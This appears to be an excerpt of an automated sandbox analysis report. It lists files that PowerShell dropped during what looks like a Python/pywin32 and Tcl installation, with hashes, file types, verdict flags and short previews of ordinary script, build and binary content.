                                                                                                                                                                                                                      MD5:600FB28442DFF01C8AC81FB41D22069F
                                                                                                                                                                                                                      SHA1:3ECDBB8C321C08F1E3FD53E9F7D5DBA17133A46F
                                                                                                                                                                                                                      SHA-256:7B8B384CDFD514A001E9A2DB67081EBF5E21A57828E8333DE16CD29C7DC80070
                                                                                                                                                                                                                      SHA-512:40E5DFFA48CF567F5E23EB51BD1C626BFCD728E498880808F212E1E8A6A6C7C48CE2DC4AA3843620A8865D205B7AF5A87220AD2F37E644B56C1DEDE98FD51002
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:# postinstall script for pywin32.#.# copies PyWinTypesxx.dll and PythonCOMxx.dll into the system directory,.# and creates a pth file.import glob.import os.import shutil.import sys.import sysconfig..try:. import winreg as winreg.except:. import winreg..# Send output somewhere so it can be found if necessary....import tempfile..tee_f = open(os.path.join(tempfile.gettempdir(), "pywin32_postinstall.log"), "w")...class Tee:. def __init__(self, file):. self.f = file.. def write(self, what):. if self.f is not None:. try:. self.f.write(what.replace("\n", "\r\n")). except IOError:. pass. tee_f.write(what).. def flush(self):. if self.f is not None:. try:. self.f.flush(). except IOError:. pass. tee_f.flush()...# For some unknown reason, when running under bdist_wininst we will start up.# with sys.stdout as None but stderr is hooked up. This work
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3721
                                                                                                                                                                                                                      Entropy (8bit):4.503953878580889
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:PPEYDOt7GfuKgqCgqgOEmgYl8AsOgN86VKmPJlCaUB2AIayrhKXyqMi:3f6wJgc6/hmPO/RyElMi
                                                                                                                                                                                                                      MD5:E1CAA86E2F353C27A56DB2611A7E2AF6
                                                                                                                                                                                                                      SHA1:B5B90B45976132E07D6E8B20B35C9A15E12A4CC1
                                                                                                                                                                                                                      SHA-256:034CF44AAE45AF89AD73AD2FC17A793792458B418607656B318530B24FA37670
                                                                                                                                                                                                                      SHA-512:756B397C4AFCC40E73BAAC22F29560F1A5D34D9F0A7A36BDF344EA81E656250717342759DDC43DCD37BA5DD3E004103DCB0E9D900A4D89E0F84ABDC9F2FE2BBD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""A test runner for pywin32""".import os.import site.import subprocess.import sys..# locate the dirs based on where this script is - it may be either in the.# source tree, or in an installed Python 'Scripts' tree..this_dir = os.path.dirname(__file__).site_packages = [. site.getusersitepackages(),.] + site.getsitepackages()..failures = []...# Run a test using subprocess and wait for the result..# If we get an returncode != 0, we know that there was an error, but we don't.# abort immediately - we run as many tests as we can..def run_test(script, cmdline_extras):. dirname, scriptname = os.path.split(script). # some tests prefer to be run from their directory.. cmd = [sys.executable, "-u", scriptname] + cmdline_extras. print("--- Running '%s' ---" % script). sys.stdout.flush(). result = subprocess.run(cmd, check=False, cwd=dirname). print("*** Test script '%s' exited with %s" % (script, result.returncode)). sys.stdout.flush(). if result.returncode:. fa
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):108445
                                                                                                                                                                                                                      Entropy (8bit):6.092435668278217
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Ga8:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+f8
                                                                                                                                                                                                                      MD5:ECD198A3A89C1D2A900C3DACA774C3D9
                                                                                                                                                                                                                      SHA1:C9C3673246425A147829649B6572CC7469429FAC
                                                                                                                                                                                                                      SHA-256:2E1751884945C4035322579261ACD01AE545A5D905BFEF0F38FDC9289EB876B5
                                                                                                                                                                                                                      SHA-512:33CC98E3C0963ADDA98210A1AE88B310372552972FA8A8A99B8E28E88F3C4198EC8026A328F3270DD270CC8EB15DFB62C2E980742F03DEEB4B872948BEBCA536
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):474
                                                                                                                                                                                                                      Entropy (8bit):4.6960996263721775
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:kF3HTbyhnBIBAVYRby902MBIBLzDBIBL1Y6:kRH2IE024IRzNIRr
                                                                                                                                                                                                                      MD5:52A5B43A45344E8DE4FAD9F37E91C59B
                                                                                                                                                                                                                      SHA1:8FBA8792E4BF72682A1E6BFEAF9E5EA96C3E078C
                                                                                                                                                                                                                      SHA-256:64D08A3ABCB271DB3AF043C535E045F7C325348D87A349A76864637BAEDD2554
                                                                                                                                                                                                                      SHA-512:9A95C87D131F1AD4CA4132864E7F7E1821B4E24A084605D94B8748512EB5A197DCDCFD3D9AAC51DCE330E1E40A76E1C3EBA15F2D6E60AFCE0B898FCF433A7D3A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:if {[info sharedlibextension] != ".dll"} return..if {[package vsatisfies [package provide Tcl] 9.0-]} {.. package ifneeded dde 1.4.4 \... [list load [file join $dir tcl9dde14.dll] Dde]..} elseif {![package vsatisfies [package provide Tcl] 8.7]...&& [::tcl::pkgconfig get debug]} {.. package ifneeded dde 1.4.4 \... [list load [file join $dir tcldde14g.dll] Dde]..} else {.. package ifneeded dde 1.4.4 \... [list load [file join $dir tcldde14.dll] Dde]..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25600
                                                                                                                                                                                                                      Entropy (8bit):5.531209790531261
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:cOKo+ZjdllRG1u6c9wPB7wbYSkyebfcm4gn:b0Ku6c9wJncd
                                                                                                                                                                                                                      MD5:BE471FCF9729B279197A3529AB76E7C1
                                                                                                                                                                                                                      SHA1:722DCDF864D09D5C0AFF0602A0DE6F6823FC16EE
                                                                                                                                                                                                                      SHA-256:2B6A1B97F9BAF246E0FD6A4052C02572724BFA37EBA0460D9069E39F382A1B3D
                                                                                                                                                                                                                      SHA-512:4C20DA557C5739E13A468B3EB879C1F9CA59B640017FC846C4A70707317DAF9E11D756296D942DCE0BCC4D2A8C30F5194A528E7A544D3178338C396D7267A529
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........nB..=B..=B..=...<@..=...<N..=...<J..=...<A..=...<C..=K.K=D..=...<G..=B..=...=...<C..=...<C..=...<C..=RichB..=................PE..d...3,.c.........." ...!.@...&.......B..............................................ZW....`.........................................`_..`...._..................................H...0Y...............................W..@............P...............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...x....p.......\..............@....pdata...............^..............@..@.reloc..H............b..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21940
                                                                                                                                                                                                                      Entropy (8bit):5.325305906485699
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:9SE8+P0ztNKmUpX3Pyoa1X3PyoMhYpRv3nvE2v2wtmsCJEAgo4eT:sCmUpPFa1PFMhY/vdf4sgEAgo4G
                                                                                                                                                                                                                      MD5:F1C102426CF8A926AADF5CA9968F6F3C
                                                                                                                                                                                                                      SHA1:1DD3718D51A5EE6CA0E9DB09710A868B2076B746
                                                                                                                                                                                                                      SHA-256:3D4C390698EA24CB1C2AB0166C7C302EC056D841DC9F4B01979128824BCFC504
                                                                                                                                                                                                                      SHA-512:D34C91A0DC6643D02810DAAED1FB12F20695328C97C8E1A51913A6F8DD453914BDAEEEDDB65C548EBC5CEBD98E5402A4AA53032D000120223ED7121CA019D308
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:/*.. * ----------------------------------------------------------------------------.. * nmakehlp.c --.. *.. *.This is used to fix limitations within nmake and the environment... *.. * Copyright (c) 2002 by David Gravereaux... * Copyright (c) 2006 by Pat Thoyts.. *.. * See the file "license.terms" for information on usage and redistribution of.. * this file, and for a DISCLAIMER OF ALL WARRANTIES... * ----------------------------------------------------------------------------.. */....#define _CRT_SECURE_NO_DEPRECATE..#include <windows.h>..#ifdef _MSC_VER..#pragma comment (lib, "user32.lib")..#pragma comment (lib, "kernel32.lib")..#endif..#include <stdio.h>..#include <math.h>..../*.. * This library is required for x64 builds with _some_ versions of MSVC.. */..#if defined(_M_IA64) || defined(_M_AMD64)..#if _MSC_VER >= 1400 && _MSC_VER < 1500..#pragma comment(lib, "bufferoverflowU")..#endif..#endif..../* ISO hack for dumb VC++ */..#ifdef _MSC_VER..#define snprintf._snprintf..#endif.....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):62846
                                                                                                                                                                                                                      Entropy (8bit):5.606177025504368
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:xaF+oYeZRyT+8Ch77407aW6myo2tlK9U7Z0knAL7K0gLWEtl4clFqcez:0yNTJw7WftlKyF0knAL7K0gLFb4mFwz
                                                                                                                                                                                                                      MD5:4EB69138710894A01F44E14D5EB83136
                                                                                                                                                                                                                      SHA1:5182B94DFD4F600A5DA7F72604C8727B0DC13342
                                                                                                                                                                                                                      SHA-256:7A830EBDBE6C06293FBB3F1CAB39EF51C55FBCACC13DF7713871C0E9BD875684
                                                                                                                                                                                                                      SHA-512:FD505DA9A9F3B90028C3B362BF2D50253BEEA5D6A5EC5F38EBA02F1F8CE17AA74ABC5EA6B05D72E10226E63E81CCF21C2B4699C40FAC1F0339D098EADFBF71DA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#------------------------------------------------------------- -*- makefile -*-..# rules.vc --..#..# Part of the nmake based build system for Tcl and its extensions...# This file does all the hard work in terms of parsing build options,..# compiler switches, defining common targets and macros. The Tcl makefile..# directly includes this. Extensions include it via "rules-ext.vc"...#..# See TIP 477 (https://core.tcl-lang.org/tips/doc/main/tip/477.md) for..# detailed documentation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# Copyright (c) 2001-2003 David Gravereaux...# Copyright (c) 2003-2008 Patrick Thoyts..# Copyright (c) 2017 Ashok P. Nadkarni..#------------------------------------------------------------------------------....!ifndef _RULES_VC.._RULES_VC = 1....# The following macros define the version of the rules.vc nmake build system..# For modifications that are not backward-compat
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2606
                                                                                                                                                                                                                      Entropy (8bit):5.467909915722982
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:+v+e9BZMsMRDbvpwycYqUQniVuy2r5q+RX8hQg+IoAIoYYgXMgUFHgsgCg3+IoWn:4x9osWDDpwfY0aCltPgfoJoxgXMgwgsE
                                                                                                                                                                                                                      MD5:7D37AEAB54B232E1956055C601AD009A
                                                                                                                                                                                                                      SHA1:BC29520B636978112D7C64925BD35A7669F1E461
                                                                                                                                                                                                                      SHA-256:48F59BA7C8050DE1CE04EDE45F1F8A8488CFE7748BF9A0D845D550CD31451E2B
                                                                                                                                                                                                                      SHA-512:09B82E00A8B8B20D86C65B93F1DF2BA68726583A641B06B154B14448EC490B1B7827D11291FACC62389799D1BCA9B4F85F4F89DEB3550818AAA4DA86526B9732
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#------------------------------------------------------------- -*- makefile -*-..# targets.vc --..#..# Part of the nmake based build system for Tcl and its extensions...# This file defines some standard targets for the convenience of extensions..# and can be optionally included by the extension makefile...# See TIP 477 (https://core.tcl-lang.org/tips/doc/main/tip/477.md) for docs.....$(PROJECT): setup pkgindex $(PRJLIB)....!ifdef PRJ_STUBOBJS..$(PROJECT): $(PRJSTUBLIB)..$(PRJSTUBLIB): $(PRJ_STUBOBJS)...$(LIBCMD) $**....$(PRJ_STUBOBJS):...$(CCSTUBSCMD) %s..!endif # PRJ_STUBOBJS....!ifdef PRJ_MANIFEST..$(PROJECT): $(PRJLIB).manifest..$(PRJLIB).manifest: $(PRJ_MANIFEST)...@nmakehlp -s << $** >$@..@MACHINE@. $(MACHINE:IX86=X86)..<<..!endif....!if "$(PROJECT)" != "tcl" && "$(PROJECT)" != "tk"..$(PRJLIB): $(PRJ_OBJS) $(RESFILE)..!if $(STATIC_BUILD).. $(LIBCMD) $**..!else.. $(DLLCMD) $**.. $(_VC_MANIFEST_EMBED_DLL)..!endif.. -@del $*.exp..!endif....!if "$(PRJ_HEADERS)
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):87
                                                                                                                                                                                                                      Entropy (8bit):4.318506571923692
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:OuMvdQ5FmFA3Bnzj3PHGv:OuEQ5F1BPPY
                                                                                                                                                                                                                      MD5:F6EF2EE18C48F4AFA415A117A9E59356
                                                                                                                                                                                                                      SHA1:9EDD8582FD49A3B0255D1C3B4B30244A4E27D155
                                                                                                                                                                                                                      SHA-256:03589B111B1A9A4DACA7FC3014F9F0ADE84E875948BE925E30726423C063089E
                                                                                                                                                                                                                      SHA-512:45D2BEFCB6EC99B287678773F97221DCB71678E8A0BFCF6E9F1D24703617E36B7D7917D7460A6E5E9136ADF8B389F7802AC2BEB0171A9F2DBE8D0F7F00F3E073
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:CORE_MACHINE = AMD64..CORE_DEBUG = 0..CORE_TCL_THREADS = 1..CORE_USE_THREAD_ALLOC = 1..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25600
                                                                                                                                                                                                                      Entropy (8bit):4.94441225384733
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:OSZ/JKNZKZCGRHJPth4VKAvDgDJgoku8:OSQQTRJPzkKAEN
                                                                                                                                                                                                                      MD5:ABBD49C180A2F8703F6306D6FA731FDC
                                                                                                                                                                                                                      SHA1:D63F4BFE7F74936B2FBACE803E3DA6103FBF6586
                                                                                                                                                                                                                      SHA-256:5F411C0BD9ED9A42B0F07ED568C7D0CF358A83063B225A1F8F7DA3296DDE90F1
                                                                                                                                                                                                                      SHA-512:290DD984ACC451B778F3DB8C510BAE7AEC1D9547C3AD0A1829DF731C136E4ECC9A37DC6A786CF8F1ECC4D14339AED1288AF25055F450F6F953138C8D4D5C36E9
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./.... .....`................@.............................................. ..............................................................`...............................................U..(...................................................text...X,..........................`.P`.data........@.......2..............@.`..rdata..@....P.......<..............@.`@.pdata.......`.......L..............@.0@.xdata.. ....p.......P..............@.0@.bss.... .............................`..idata...............T..............@.0..CRT....h............`..............@.@..tls.................b..............@.@.........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):367
                                                                                                                                                                                                                      Entropy (8bit):4.633662369394115
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:CsUgabAOgjD/0JDKykDjvFJbCfX7MQ9Q3dEIBSGERWZof7MQ9Q3dEIBSGzI8W6:lGbyCWF3HgGdEIBewZ/dEIBRIH6
                                                                                                                                                                                                                      MD5:2432EB4BB85317F6C0D1CB14234664B3
                                                                                                                                                                                                                      SHA1:61A9827F5CE90B47B1FC0C7D7C7470CB3313787B
                                                                                                                                                                                                                      SHA-256:1BD0FC8CBA2BB1CDD5E5CFCC614B0EF4C8CF4698904D1E48C0F103519C5579E0
                                                                                                                                                                                                                      SHA-512:DEE270A417BBDACCED81A92E27A6BD94304B074EF20F1506DF8EB1A7B5CA85E6F156A569356B1027F9E2673A8E091213C14DDB7B97F0E4526E0F6659E6C6F5C3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:if {![package vsatisfies [package provide Tcl] 8.5]} return..if {[info sharedlibextension] != ".dll"} return..if {[::tcl::pkgconfig get debug]} {.. package ifneeded registry 1.3.5 \.. [list load [file join $dir tclreg13g.dll] Registry]..} else {.. package ifneeded registry 1.3.5 \.. [list load [file join $dir tclreg13.dll] Registry]..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22016
                                                                                                                                                                                                                      Entropy (8bit):5.504085917381921
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Egd2+KQiARRvWDEBAYdCRVv9evQqlXETxjEf9+zxYwDeXyLAfQI:tARqvWDsPCRVNqlX7SxxDKyMF
                                                                                                                                                                                                                      MD5:50BD70865CD710FF916CF7D5D3F6087B
                                                                                                                                                                                                                      SHA1:42D25E2ADE2A29114FD11789E97B780F7748CB9C
                                                                                                                                                                                                                      SHA-256:3CC348B30B1B7C130AA7ADBD325972FB91A475895B1AB827150BDB923FA6A5D6
                                                                                                                                                                                                                      SHA-512:A1F97A36EB98B99EEEA61257B2411FDFCBD3DC9CE38AEBF10A16018EC9C2FF1AB916A6A4FA4781AAAC1F7D53F0FE5C424E4C67715E38ED37EE8FF7475A36FADA
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.5.r.[.r.[.r.[..Z.p.[..^.~.[.._.z.[..X.q.[..._.s.[.{..t.[...Z.u.[.r.Z.F.[...S.s.[...[.s.[...Y.s.[.Richr.[.........PE..d...3,.c.........." ...!.2...&...... 6..............................................xv....`.........................................0`..h....`..................................\...PY...............................X..@............P...............................text...H1.......2.................. ..`.rdata.......P.......6..............@..@.data...h....p.......N..............@....pdata...............P..............@..@.reloc..\............T..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21523
                                                                                                                                                                                                                      Entropy (8bit):4.827830596623684
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:UqT9XC9VZv9QXCTxsCTHI7672ORgS0mzBvxFRTX7Xvt3wBTnFXhCUvuyqz:LT9XC9VZviXCVsCLI7JlmzBvTxvt3gTW
                                                                                                                                                                                                                      MD5:08EDF746B4A088CB4185C165177BD604
                                                                                                                                                                                                                      SHA1:395CDA114F23E513EEF4618DA39BB86D034124BF
                                                                                                                                                                                                                      SHA-256:517204EE436D08EFC287ABC97433C3BFFCAF42EC6592A3009B9FD3B985AD772C
                                                                                                                                                                                                                      SHA-512:C1727E265A6B0B54773C886A1BCE73512E799BA81A4FCEEEB84CDC33F5505A5E0984E96326A78C46BF142BC4652A80E213886F60EB54ADF92E4DFFE953C87F6B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# auto.tcl --..#..# utility procs formerly in init.tcl dealing with auto execution of commands..# and can be auto loaded themselves...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# auto_reset --..#..# Destroy all cached information for auto-loading and auto-execution, so that..# the information gets recomputed the next time it's needed. Also delete any..# commands that are listed in the auto-load index...#..# Arguments:..# None.....proc auto_reset {} {.. global auto_execs auto_index auto_path.. if {[array exists auto_index]} {...foreach cmdName [array names auto_index] {... set fqcn [namespace which $cmdName]... if {$fqcn eq ""} {....continue... }... rename $fqcn {}...}.. }.. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath.. if {
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):133439
                                                                                                                                                                                                                      Entropy (8bit):5.044814789288095
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:Cbn4IAhYvuCg9epsArAzqpSMpWzP7ejMiIAxBPqGYkPAPaZpHYM8EN4LhVLlarXL:Cbn4IM9epsArSqpSMpWzP7ejM/eBPqG3
                                                                                                                                                                                                                      MD5:88BB44A1364147FDD80F9FD78FBCEF61
                                                                                                                                                                                                                      SHA1:2C3454D2669F0CA83FECF17976D599C85B86E615
                                                                                                                                                                                                                      SHA-256:1947F8B188AB4AB6AA72EA68A58D2D9ADD0894FDF320F6B074EAE0F198368FB7
                                                                                                                                                                                                                      SHA-512:010B13E8A2D50521B5D7ADCC5F32F7CDE3F12E1053961C575D967DC6CFD368640BF45D23832E5E9C3868CDCA9FE0505698F949C5557D4169353634C94AA196B5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#----------------------------------------------------------------------..#..# clock.tcl --..#..#.This file implements the portions of the [clock] ensemble that are..#.coded in Tcl. Refer to the users' manual to see the description of..#.the [clock] command and its subcommands...#..#..#----------------------------------------------------------------------..#..# Copyright (c) 2004-2007 Kevin B. Kenny..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#----------------------------------------------------------------------....# We must have message catalogs that support the root locale, and we need..# access to the Registry on Windows systems.....uplevel \#0 {.. package require msgcat 1.6.. if { $::tcl_platform(platform) eq {windows} } {...if { [catch { package require registry 1.1 }] } {... namespace eval ::tcl::clock [list variable NoRegistry {}]...}.. }..}....# Put the library directory in
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1110
                                                                                                                                                                                                                      Entropy (8bit):2.1033474959326957
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:5c2VBUvEWVrVJ/eyN9j2iV2NdWWT0VbusV7EV7KVAMmVZyd851VFpsGkliX:5HVBUlJvRj7SOVbusZhAMiZyi77qsX
                                                                                                                                                                                                                      MD5:9E3A454FA480E9A99D2D5ACDAA775233
                                                                                                                                                                                                                      SHA1:493637BB570A5C96BB62F998BD0391FB59AFC5F0
                                                                                                                                                                                                                      SHA-256:FB87BF197F4F485B08EA81F7534BC07D9C3A538D022424BE11011A1FE3C413FD
                                                                                                                                                                                                                      SHA-512:EDFCB2BB6AB052D28D5CEBD08AD57F36D3A4CB83D557B1359B0ADE1266E24D8F3CE87B8240881396A5BA4FB45F8B74014784E8885CDB86680D98977CC0D130F0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: ascii, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):94389
                                                                                                                                                                                                                      Entropy (8bit):3.3217406555698195
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:UAHU3LIkZlmXrd/uQ0ao98zgKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fd:UVduBGf94gFMT6q95GDRBfd
                                                                                                                                                                                                                      MD5:41A874778111CC218BD421CF9C795EC2
                                                                                                                                                                                                                      SHA1:80857D106F71199CE187833D38DB091A819A520C
                                                                                                                                                                                                                      SHA-256:AD1ED201B69855BFD353BF969DFC55576DA35A963ABF1BF7FC6D8B5142A61A61
                                                                                                                                                                                                                      SHA-512:4244624124F86A3EFAB4C70B115A46C8ADF02D708860FA5F327CDBFA24BC3F9EFAD0C6EE58DE96B0B6BBC4CF6D99B322BB8657129007C86D6482F41C1503AAD4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: big5, multi-byte..M..003F 0 89..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):98634
                                                                                                                                                                                                                      Entropy (8bit):2.438904802083714
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:MPFOsOKqBLPf62X4lgQeLHj6RHUn0TQb8G47Ianrd28gr:MPAsknjX4OQe7aoMMarAFr
                                                                                                                                                                                                                      MD5:B6A7C59E6A48D91CC2DBCB2BBA7E4510
                                                                                                                                                                                                                      SHA1:16A9338F18202B26981F2028BEA412DD03BB0FF2
                                                                                                                                                                                                                      SHA-256:8924545CC92584169138AADB64683C07BBF846A57014C2E668D23B63F43F3610
                                                                                                                                                                                                                      SHA-512:3D644CF394A528A8699BE3679F787A4E1DAD657C04B810580A4C520F2C043471640FBE080AC46DFD3924C47A73BEE12A6AC69D291D09EB791AD0D64A73750B43
                                                                                                                                                                                                                      Malicious:false
